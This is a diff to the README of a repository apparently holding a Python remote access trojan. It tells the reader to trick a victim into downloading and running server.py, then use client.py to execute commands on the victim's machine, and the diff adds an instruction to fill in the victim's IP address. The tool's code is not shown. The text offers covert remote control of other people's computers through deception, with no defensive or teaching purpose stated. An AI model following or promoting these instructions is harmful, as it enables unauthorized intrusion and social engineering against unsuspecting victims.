AdmiralGaust/python_RAT/README.md

 # Working

-Just trick the victim to download and run server.py file.Thereafter,all you need to do is run client.py on your local machine and enjoy remote execution of commands on victim's machine.Hope you will like it.
+Just trick the victim to download and run server.py file.Thereafter,all you need to do is run client.py on your local machine and enjoy remote execution of commands on victim's machine.
+Make sure to replace victims_ip_address in line 18 with the actual ip of victim.

+Hope you will like it.